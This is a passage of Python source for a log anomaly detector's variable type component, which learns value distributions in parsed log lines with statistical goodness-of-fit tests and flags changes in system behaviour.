int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] def receive_atom(self, log_atom): """Receive an parsed atom and the information about the parser match. Initializes Variables for new eventTypes. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False event_index = self.event_type_detector.current_index if event_index == -1: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False self.log_total += 1 parser_match = log_atom.parser_match # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False # Initialize new entries in lists for a new eventType if necessary if len(self.length) < event_index + 1 or self.var_type[event_index] == []: for _ in range(event_index + 1 - len(self.length)): self.length.append(0) self.variable_path_num.append([]) self.var_type.append([]) self.alternative_distribution_types.append([]) self.distr_val.append([]) self.bt_results.append([]) # Number of variables self.length[event_index] = len(self.event_type_detector.variable_key_list[event_index]) # List of the found vartypes self.var_type[event_index] = [[] for i in range(self.length[event_index])] # Stores the alternative distributions of the variable self.alternative_distribution_types[event_index] = [[] for i in range(self.length[event_index])] # Stores the values the distribution, which are needed for the s_gof self.distr_val[event_index] = [[] for i in range(self.length[event_index])] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results[event_index] = [[] for i in range(self.length[event_index])] # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty if self.target_path_list is not None: for var_index in range(self.length[event_index]): if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list: self.variable_path_num[event_index].append(var_index) if self.num_events < event_index + 1: self.num_events = event_index + 1 # Processes the current log-line by testing and updating self.process_ll(event_index, log_atom) return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" tmp_list = [self.var_type, self.alternative_distribution_types, self.var_type_history_list, self.var_type_history_list_reference, self.failed_indicators, [[self.distr_val[event_index][var_index] if ( len(self.distr_val[event_index][var_index]) > 0 and self.var_type[event_index][var_index][0] == 'emp') else [] for var_index in range(len(self.distr_val[event_index]))] for event_index in range(len(self.distr_val))]] PersistenceUtil.store_json(self.persistence_file_name, tmp_list) if self.save_statistics: PersistenceUtil.store_json(self.statistics_file_name, [ self.failed_indicators_total, self.failed_indicators_values, self.failed_indicators_paths, self.failed_indicators]) logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__) def load_persistence_data(self): """Extract the persistence data and appends various lists to create a consistent state.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Import the lists of the persistence self.var_type = persistence_data[0] self.alternative_distribution_types = persistence_data[1] self.var_type_history_list = persistence_data[2] self.var_type_history_list_reference = persistence_data[3] self.failed_indicators = persistence_data[4] self.distr_val = persistence_data[5] self.num_events = len(self.var_type) # Create the initial lists which derive from the persistence # Number of variables of the single events self.length = [len(self.event_type_detector.variable_key_list[event_index]) for event_index in range(self.num_events)] self.variable_path_num = [[] for _ in range(self.num_events)] # List of the successes of the binomialtest for the rejection in the s_gof or variables of discrete type self.bt_results = [[[] for var_index in range(self.length[event_index])] for event_index in range(self.num_events)] # Updates the lists for each eventType individually for event_index in range(self.num_events): # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty if self.target_path_list is not None: for var_index in range(self.length[event_index]): if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list: self.variable_path_num[event_index].append(var_index) # Initializes the lists for the discrete distribution, or continuous distribution for var_index, var_val in enumerate(self.var_type[event_index]): if len(var_val) > 0: if var_val[0] in self.distr_list: self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if var_val[0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) elif var_val[0] == 'd': self.d_init_bt(event_index, var_index) logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__) def process_ll(self, event_index, log_atom): """Process the log line. Extracts and appends the values of the log line to the values- list. """ # Return if no variable is tracked in the VTD if len(self.event_type_detector.variable_key_list[event_index]) == 0 or ( self.target_path_list is not None and self.variable_path_num[event_index] == []): return # Initial detection of variable types if self.event_type_detector.num_event_lines[event_index] >= self.num_init and \ self.event_type_detector.check_variables[event_index][0] and self.var_type[event_index][0] == []: # Test all variables logging.getLogger(DEBUG_LOG_NAME).debug('%s started initial detection of var types.', self.__class__.__name__) if self.target_path_list is None: for var_index in range(self.length[event_index]): tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # Mark the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type # Test only the variables with paths in the target_path_list else: for var_index in self.variable_path_num[event_index]: tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is range elif tmp_var_type[0] == 'range': self.var_type[event_index][var_index] = tmp_var_type # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # mMrk the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type self.init_var_type_history_list(event_index) self.print_initial_var_type(event_index, log_atom) self.log_new_learned += len(self.var_type[event_index]) self.log_new_learned_values.append(self.var_type[event_index]) # Update variable types elif self.event_type_detector.num_event_lines[event_index] > self.num_init and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: logging.getLogger(DEBUG_LOG_NAME).debug('%s started update phase of var types.', self.__class__.__name__) # Check if the updates of the variable types should be stopped if self.learn_mode and (not isinstance(self.num_stop_update, bool)) and ( self.event_type_detector.total_records >= self.num_stop_update): self.learn_mode = False # Get the index_list for the variables which should be updated index_list = None if self.target_path_list is None: index_list = range(self.length[event_index]) else: index_list = self.variable_path_num[event_index] self.log_updated += len(index_list) # Update the variable types and history list for var_index in index_list: # Skips the variable if check_variable is False if not self.event_type_detector.check_variables[event_index][var_index]: continue # Update variable types self.update_var_type(event_index, var_index, log_atom) # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif self.var_type_history_list_order[type_index] == 'range': tmp_type_val[0].append(self.var_type[event_index][var_index][1]) tmp_type_val[1].append(self.var_type[event_index][var_index][2]) elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for i in range(1, len(tmp_type_val)): tmp_type_val[i].append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) # Reduce the number of variables, which are tracked if (self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update == self.num_updates_until_var_reduction - 1): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): # Skips the variable if it is already not being checked if not self.event_type_detector.check_variables[event_index][var_index]: continue tmp_max = 1 exceeded_thresh = False for type_index in range(1, len(var_val)): # Continuous Distribution if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: num_app = len([1 for x in var_val[type_index][1] if x != 0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Distributions which are neither continuous nor range else: if len(var_val[type_index]) >= 1 and isinstance(var_val[type_index][0], list): num_app = sum(var_val[type_index][0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app else: num_app = sum(var_val[type_index]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Remove the variable if it did not exceed the threshold if not exceeded_thresh: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] self.distr_val[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len( self.var_type_history_list_reference[event_index]) > var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print( f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with ' f'Path:\n{affected_path}\nbecause of irregular variable types.', log_atom, affected_path, confidence=1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085) # 1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085 is the scaled sigmoidfunction. # 1 / (1 + np.exp(-4)) = 0.9820137900379085 # Saves the initial reference state of the var_type_history_list for the calculation of the indicator if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance(self.num_var_type_hist_ref, bool)) and ( (len(self.var_type_history_list_reference) < event_index + 1) or self.var_type_history_list_reference[event_index] == []) and ( (self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_var_type_hist_ref - 1): if len(self.var_type_history_list_reference) < event_index + 1: for i in range(event_index + 1 - len(self.var_type_history_list_reference)): self.var_type_history_list_reference.append([]) for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index].append([]) for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): # Continuous variable type if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][-self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append([sum(x[ -self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum(type_val[-self.num_var_type_hist_ref:])) # Check the indicator for the variable types of the Event and generates an output, if it fails else: if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance( self.num_var_type_considered_ind, bool)) and (not isinstance(self.num_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) > event_index and (self.var_type_history_list_reference[event_index] != []) and ( ((self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_var_type_considered_ind) == 0: # Shorten the var_type_history_list if len(self.var_type_history_list[event_index]) > 0 and len(self.var_type_history_list[event_index][0]) > 0 and len( self.var_type_history_list[event_index][0][0]) > max( self.num_var_type_considered_ind, self.num_var_type_hist_ref): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): for type_index, type_val in enumerate(var_val): # Differentiation between the entries, which are lists (e.g. discrete) and values if isinstance(type_val[0], list): for i, val in enumerate(type_val): if isinstance(val, list): type_val[i] = val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] else: var_val[type_index] = type_val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] indicator_list = self.get_indicator(event_index) indicator = max(0, max(indicator_list)) if indicator >= self.indicator_thres: # Update the list of the failed indicators, which is used for the weights of the indicator if len(self.failed_indicators) < event_index + 1: # Extend the lists if necessary tmp_len = len(self.failed_indicators) for i in range(event_index + 1 - tmp_len): self.failed_indicators.append([[] for _ in range(len(self.var_type[tmp_len + i]))]) # Indices of the variables, which would have failed the indicator indices_failed_tests = [] for var_index in range(len(self.var_type[event_index])): if indicator_list[var_index] >= self.indicator_thres: indices_failed_tests.append(var_index) self.failed_indicators[event_index][var_index].append(self.event_type_detector.num_event_lines[event_index]) # Multiply the single values of the indicator with their corresponding weights # Number of the log line which corresponds to the first indicator, which is taken into account first_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * (self.num_ind_for_weights + self.num_skipped_ind_for_weights) # Number of the log line which corresponds to the last indicator, which is taken into account last_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * self.num_skipped_ind_for_weights for var_index in indices_failed_tests: lower_ind = False # Index of the lower limit of the considered values of the failed_indicator list upper_ind = False # Index of the upper limit of the considered values of the failed_indicator list for i, val in enumerate(self.failed_indicators[event_index][var_index]): if val >= first_line_num: lower_ind = i break if isinstance(lower_ind, bool): lower_ind = 0 upper_ind = 0 else: for i, val in enumerate(self.failed_indicators[event_index][var_index], start=lower_ind): if val >= last_line_num: upper_ind = i break if isinstance(upper_ind, bool): upper_ind = len(self.failed_indicators[event_index][var_index]) # Calculating the weight for the indicator indicator_weight = 1 / (1 + upper_ind - lower_ind) indicator_list[var_index] = indicator_list[var_index] * indicator_weight # Reduce the list of the failed indicators self.failed_indicators[event_index][var_index] = self.failed_indicators[event_index][var_index][lower_ind:] # Calculate and print the confidence of the failed indicator indicator = sum(indicator_list[var_index] for var_index in indices_failed_tests) if self.save_statistics: self.failed_indicators_total.append(log_atom.atom_time) self.failed_indicators_values.append(np.arctan(2 * indicator) / np.pi * 2) if self.event_type_detector.id_path_list != []: self.failed_indicators_paths.append(self.event_type_detector.id_path_list_tuples[event_index]) else: self.failed_indicators_paths.append(self.event_type_detector.longest_path[event_index]) tmp_string = '' affected_paths = [self.event_type_detector.variable_key_list[event_index][var_index] for var_index in indices_failed_tests] if self.var_type_history_list: tmp_string += f'Event {self.event_type_detector.get_event_type(event_index)}: ' tmp_string += f'Indicator of a change in system behaviour: {np.arctan(2 * indicator) / np.pi * 2}. Paths to' \ f' the corresponding variables: {affected_paths}' self.print(tmp_string, log_atom, affected_paths, np.arctan(2 * indicator) / np.pi * 2, indicator=True) # Update the var_type_history_list_reference if self.learn_mode and (not isinstance(self.num_var_type_hist_ref, bool)) and ( not isinstance(self.num_update_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) >= event_index + 1 and \ self.var_type_history_list_reference[event_index] != [] and ((( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_update_var_type_hist_ref == 0): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index][var_index] = [] for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Continuous or range variable type # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][ -self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][ -self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append( [sum(x[-self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum( type_val[-self.num_var_type_hist_ref:])) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) def detect_var_type(self, event_index, var_index): """Give back the assumed variable type of the variable with the in self.event_type_detector stored values.""" # Values which are being tested values = self.event_type_detector.values[event_index][var_index][-self.num_init:] # Unique values values_set = set(values) # Number of unique values num_diff_vals = len(values_set) if num_diff_vals == 1: return ['stat', list(values_set), False] # List of floats or False float_values = convert_to_floats(values) is_int = False if len(float_values) > 0: is_int = consists_of_ints(float_values) # Values are integer numbers if len(float_values) > 0: previous_val = float_values[0] asc = True desc = True # Test for ascending for v in float_values[1:]: if previous_val > v: asc = False break previous_val = v previous_val = float_values[0] # Test for descending for v in float_values[1:]: if previous_val < v: desc = False break previous_val = v if asc: if is_int: return ['asc', 'int'] return ['asc', 'float'] if desc: if is_int: return ['desc', 'int'] return ['desc', 'float'] # Checking if no integers should be tested and if the values are integers if not self.test_gof_int and is_int: float_values = [] if len(float_values) > 0 and (num_diff_vals > self.div_thres * self.num_init): float_values_mean = np.mean(float_values) dw_result = durbin_watson([val - float_values_mean for val in float_values]) if dw_result < self.crit_val_dw[self.dw_alpha][len(float_values)] or\ dw_result > 4 - self.crit_val_dw[self.dw_alpha][len(float_values)]: var_type = self.calculate_value_range(float_values) else: # test for a continuous distribution. If none fits, the function will return ['d'] var_type = self.detect_continuous_shape(float_values) else: # discrete var type var_type = ['d'] # Test for discrete, unique and others if var_type == ['d']: if self.num_init == num_diff_vals and (len(float_values) == 0 or is_int): # unique var type return ['unq', values] if num_diff_vals >= self.num_init * (1 - self.sim_thres): # Values do not follow a specific pattern, the second entry is the number of update runs without a new type. return ['others', 0] # Initialize the discrete type values_set = list(values_set) values_app = [0 for _ in range(num_diff_vals)] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] # discrete var type return ['d', values_set, values_app, len(values)] return var_type def detect_continuous_shape(self, values): """Detect if the sample follows one of the checked continuous distribution and returns the found type in a fitting format. ['d'] if none fit. """ # List of the p-values of the distributions significance = [] # List of the tested distributions distribution = [] # Converts the floats/integer to an array for faster manipulations and tests values = np.array(values) if self.used_gof_test == 'KS': # Test for uniform distribution min_val = min(values) max_val = max(values) if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'uni'] / kstest(values, 'uniform', args=(min_val, max_val - min_val))[0]) distribution.append(['uni', min_val, max_val]) else: significance.append(kstest(values, 'uniform', args=(min_val, max_val - min_val))[1]) distribution.append(['uni', min_val, max_val]) # Test for normal distribution # Getting the expected value and sigma [ev, sigma] = norm.fit(values) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'nor'] / kstest((values - ev) / sigma, 'norm')[0]) distribution.append(['nor', ev, sigma, min_val, max_val]) else: significance.append(kstest((values - ev) / sigma, 'norm')[1]) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta distribution # (0.5*0.5/((0.5+0.5+1)(0.5+0.5)^2))^(1/2) = 2.82842712 ev_tmp = (min_val + max_val) / 2 sigma_tmp = (max_val - min_val) / 2.82842712 if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta1'] / kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[0]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) else: significance.append(kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[1]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: # Beta 2 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) else: # Beta 2 significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Crit value for the self generated or mixed distributions crit_val = pow(-np.log(self.gof_alpha) * 3 / self.num_init / 4, 1 / 2) est_penalty = 1.4 # Estimated penalty for the adapted ev and SD # Test for the mixed beta distribution # ev/sigma of Beta 4: ev=1/(1+5) sigma=pow(1*5/(1+5+1),1/5)/(1+5) # sigma in [sigmaBetam1,sigmaBetam2] if 1 / 6 < (ev - min_val) / (max_val - min_val) < 5 / 6: # Interpolate the expected distribution functions threw the sigma in the interval proportion = ((ev - min_val) / (max_val - min_val) - 5 / 6) / (-4 / 6) tmp_index = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))] if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[0] / crit_val * est_penalty) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) else: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[1]) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) # Test for alternative distribution # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append( ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) else: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append(ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) # Check if one of the above tested continuous distribution fits if max(significance) >= self.gof_alpha: sort_indices = np.argsort(significance) sort_list = [] for i in range(len(sort_indices) - 2, -1, -1): if significance[sort_indices[i]] >= self.gof_alpha: sort_list.append(distribution[sort_indices[i]]) return distribution[sort_indices[-1]] + [sort_list] if self.used_gof_test == 'CM': min_val = min(values) max_val = max(values) [ev, sigma] = norm.fit(values) # Test for uniform distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.min_mod_ini_uni-self.max_mod_ini_uni) + self.min_mod_ini_uni, 'uniform') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['uni']) distribution.append(['uni', min_val - self.min_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val), max_val + self.max_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val)]) # Test for normal distribution significance.append(cramervonmises((values-ev) / sigma, 'norm') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['nor']) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta1 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) + self.min_mod_ini_beta1, 'beta', args=(0.5, 0.5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta1']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), max_val + self.max_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), 1]) # Test for beta2 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.min_mod_ini_beta2, 'beta', args=(5, 2)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), max_val + self.max_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), 2]) # Test for beta3 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.max_mod_ini_beta2, 'beta', args=(2, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.max_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), max_val + self.min_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), 3]) # Test for beta4 distribution significance.append(cramervonmises((values-min_val) / (ev-min_val) * (1/6-self.min_mod_ini_beta4) + self.min_mod_ini_beta4, 'beta', args=(1, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Test for beta5 distribution significance.append(cramervonmises((values-max_val) / (max_val-ev) * (1/6-self.min_mod_ini_beta4) + 1 - self.min_mod_ini_beta4, 'beta', args=(5, 1)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Check if one of the above tested continuous distribution fits if min(significance) <= 1: sort_indices = np.argsort(significance) sort_list = [] for i in sort_indices[1:]: if significance[i] >= self.gof_alpha: 